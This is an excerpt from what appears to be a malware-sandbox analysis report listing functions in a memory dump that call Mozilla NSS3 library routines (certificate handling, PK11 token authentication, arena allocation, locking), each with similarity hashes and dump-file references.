CERT_DestroyCertList.NSS3(00000000), ref: 6C67AD5E

Part of subcall function 6C6957D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C65B41E,00000000,00000000,?,00000000,?,6C65B41E,00000000,00000000,00000001,?), ref: 6C6957E0
Part of subcall function 6C6957D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C695843

CERT_DestroyCertList.NSS3(?), ref: 6C67AD36

Part of subcall function 6C652F50: CERT_DestroyCertificate.NSS3(?), ref: 6C652F65
Part of subcall function 6C652F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C652F83

free.MOZGLUE(?), ref: 6C67AD4F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: c316fa99c2415fe033c095782c5021dee481ffc4e23ef2823e67bd9a7e5904a3
Instruction ID: 1291df39e8fb8ef07b23470c6e9bc4e18b6918a77df3a0da5a3ecec13f47f094
Opcode Fuzzy Hash: c316fa99c2415fe033c095782c5021dee481ffc4e23ef2823e67bd9a7e5904a3
Instruction Fuzzy Hash: 9821A4B1D002048BEB20DFA4D9055EE77B4AF05248F555469D8057B701F731EA55CBB9

Function 6C6AECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C6AF0AD,6C6AF150,?,6C6AF150,?,?,?), ref: 6C6AECBA

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C6AECD1

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C6AED02

Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C6AED5A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 76dde72ef65d2d73a85da6562e265c10ea3bb2b4ad39952e19a0229eff78b9b9
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: D321D4B1A007425BE700DF25D944B52B7E4BFA5308F15C215E81C87661FB70E9A5C7E8

Function 6C67C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C67C890

Part of subcall function 6C678F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FAF
Part of subcall function 6C678F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FD1
Part of subcall function 6C678F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C678FFA
Part of subcall function 6C678F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C679013
Part of subcall function 6C678F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C679042
Part of subcall function 6C678F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C67905A
Part of subcall function 6C678F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C679073
Part of subcall function 6C678F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C66DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C679111

PR_GetCurrentThread.NSS3 ref: 6C67C8B2

Part of subcall function 6C719BF0: TlsGetValue.KERNEL32(?,?,?,6C760A75), ref: 6C719C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C67C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C67C8EB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 7d0028efb9231d4b9fc36f0d45b261afb182516d63cd1934b942d5fdec37225c
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: ED010C66E011107BD72027B59C80AFF3E689F4635CF040935FD05A6B11F361881993FA

Function 6C76CB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C719890: TlsGetValue.KERNEL32(?,?,?,6C7197EB), ref: 6C71989E

EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6C6E5262,?,?,?,6C6DE333,?,?,6C6DDC77), ref: 6C76CB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6C6E5262,?,?,?,6C6DE333,?,?,6C6DDC77), ref: 6C76CB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6C6E5262,?,?,?,6C6DE333,?,?,6C6DDC77), ref: 6C76CBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6C6E5262,?,?,?,6C6DE333,?,?,6C6DDC77), ref: 6C76CBD2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: a9b95c0f82b534200681ab49253f31aedff929706dee77d32de921b99d4159e3
Instruction ID: eda37815828bcdde5384023e0b1ebc4e593584f83e1180d70d9b96c04593e80a
Opcode Fuzzy Hash: a9b95c0f82b534200681ab49253f31aedff929706dee77d32de921b99d4159e3
Instruction Fuzzy Hash: A5119072A05601ABDB00AF36DA48646B3A4BB5032EF188239D81C57F01E731F896CBD1

Function 6C6A4900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C68C79F,?,?,6C6A5C4A,?), ref: 6C6A4950

Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8821
Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A883D
Part of subcall function 6C6A8800: EnterCriticalSection.KERNEL32(?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8856
Part of subcall function 6C6A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6A8887
Part of subcall function 6C6A8800: PR_Unlock.NSS3(?,?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8899

TlsGetValue.KERNEL32(?,?,?), ref: 6C6A496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A4989

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 463071d6597125538b0655596557b80b46ae6775e19ee8143bb49308f4d1e8f2
Instruction ID: c7f5df907f0f0ec25440c78babffd7c54316c9d3ce93e8cb8b8a621bcedf8f6b
Opcode Fuzzy Hash: 463071d6597125538b0655596557b80b46ae6775e19ee8143bb49308f4d1e8f2
Instruction Fuzzy Hash: 311134B1A00200ABEB005FA8DC41A66B3B8FF0736DB141435E91987F11EF21EC26879E

Function 6C6DEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6C7FFA,?,6C6C9767,?,8B7874C0,0000A48E), ref: 6C6DEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6C7FFA,?,6C6C9767,?,8B7874C0,0000A48E), ref: 6C6DEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6C7FFA,?,6C6C9767,?,8B7874C0,0000A48E), ref: 6C6DEE14

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

memcpy.VCRUNTIME140(?,?,6C6C9767,00000000,00000000,6C6C7FFA,?,6C6C9767,?,8B7874C0,0000A48E), ref: 6C6DEE33

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 8ba0d05e806e6b6c8851631dd08f162fd594bb2f7d2f84c5f37d785d5b27f301
Instruction ID: 6366d671b69e6cc108f5464cd7262ec5bf8ed3184d4b0d7b75badfa1f2ea736e
Opcode Fuzzy Hash: 8ba0d05e806e6b6c8851631dd08f162fd594bb2f7d2f84c5f37d785d5b27f301
Instruction Fuzzy Hash: 3611C2B1A00707ABEB209EA5DC84B46F3A8FF0435DF224531E919C2A00E731F465CBE9

Function 6C6C08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6C09B3,0000001A,?), ref: 6C6C08E9

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6C08FD

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C6C0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6C0953

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 7c9293297013f36a3c0a795ec064ff17674f29acf68be1d431aefa42cdc42a43
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: B901C0F1B0968A6BFB149A369C10B673798DF8531CF105439ED1AC6A41EB31E8148B9F

Function 6C6A49C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8821
Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A883D
Part of subcall function 6C6A8800: EnterCriticalSection.KERNEL32(?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8856
Part of subcall function 6C6A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6A8887
Part of subcall function 6C6A8800: PR_Unlock.NSS3(?,?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8899

PR_SetError.NSS3 ref: 6C6A4A10
TlsGetValue.KERNEL32(6C69781D,?,6C68BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6A4A24
EnterCriticalSection.KERNEL32(?,?,?,6C68BD28,00CD52E8), ref: 6C6A4A39
PR_Unlock.NSS3(?,?,?,?,6C68BD28,00CD52E8), ref: 6C6A4A4E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: d1050ce05f0526af00cd08f2bbf294287003b3d0954b7e97d4bb7bca6bae50ea
Instruction ID: e668afd88e1602f720638fe6bd0f9e90d2a111c1d1dbecaa04d853971174b9b8
Opcode Fuzzy Hash: d1050ce05f0526af00cd08f2bbf294287003b3d0954b7e97d4bb7bca6bae50ea
Instruction Fuzzy Hash: FF216D74A057008FDB00AFB8C48896AB7F4FF46358F015929D8858BB01EB30EC55CB9D

Function 6C64EAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C64EB13
htonl.WSOCK32(00000000,?), ref: 6C64EB26
htons.WSOCK32(?), ref: 6C64EB44
PR_GetCurrentThread.NSS3(?), ref: 6C64EB58

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: b987e4ad2c3554296ffb97fba6109e9b86d39f3c75f4dc78fec3269ea825488a
Instruction ID: e1f34c3ce06dbf8e3cfb4d185da5950a4bb15932eff32bbc9eaced490fa2ff90
Opcode Fuzzy Hash: b987e4ad2c3554296ffb97fba6109e9b86d39f3c75f4dc78fec3269ea825488a
Instruction Fuzzy Hash: 46119861D24B9197D310CF258A056B6B3B4BFA6318F01DB1EE8CA47E61E770A1C0C399

Function 6C678DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C678DE7
EnterCriticalSection.KERNEL32 ref: 6C678DFC
PR_Unlock.NSS3 ref: 6C678E2D
PR_SetError.NSS3 ref: 6C678E49

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a5fec77f60fd7b27d5c6413465cdb604dad906b0c8a935b001935ce7cf77b113
Instruction ID: 1f2f05af8d7cdf630b08cf4df1927fd49a393801eb20a4114f724b09bb2259b6
Opcode Fuzzy Hash: a5fec77f60fd7b27d5c6413465cdb604dad906b0c8a935b001935ce7cf77b113
Instruction Fuzzy Hash: 911191716056019FD700AF78D4485A9BBF4FF09354F014969DC88D7700E730E895CBDA

Function 6C6E2BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E2BF0

Part of subcall function 6C6595B0: TlsGetValue.KERNEL32(00000000,?,6C6700D2,00000000), ref: 6C6595D2
Part of subcall function 6C6595B0: EnterCriticalSection.KERNEL32(?,?,?,6C6700D2,00000000), ref: 6C6595E7
Part of subcall function 6C6595B0: PR_Unlock.NSS3(?,?,?,?,6C6700D2,00000000), ref: 6C659605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E2C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E2C1E
free.MOZGLUE(?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E2C4A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: 0a2ef2a7b1592690f615efa9f743844a926f29f7c7d6bc4ad5f068e06c75f240
Instruction ID: a2f153d61c443808f65b7a965f4241c0c97241ad19da75ffaaf03f2776693603
Opcode Fuzzy Hash: 0a2ef2a7b1592690f615efa9f743844a926f29f7c7d6bc4ad5f068e06c75f240
Instruction Fuzzy Hash: 0D017CF1A017015BEB20CF35E908753B3F9AF59A48F100A29E88AC3B41FB31F5588699

Function 6C6FAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C6E5F17,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C6E5F17,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FACDB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 94bacba1003486e81ad315087874fecb84fc0032ded1ab4ee9924434d9633d88
Instruction ID: 946dbee206ebbe9353e9fd703242d2c833e9dd608ba5f2ff18a69ec3cb070919
Opcode Fuzzy Hash: 94bacba1003486e81ad315087874fecb84fc0032ded1ab4ee9924434d9633d88
Instruction Fuzzy Hash: F6015EB5701B029BEB50DF69E908757B7E8BF00759B104839E86AC3E11E731F055CB95

Function 6C6A88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C6B08AA,?), ref: 6C6A88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C6B08AA,?), ref: 6C6A890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C6B08AA,?), ref: 6C6A8936
PR_Unlock.NSS3(?,?,?,?,?,6C6B08AA,?), ref: 6C6A8940

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

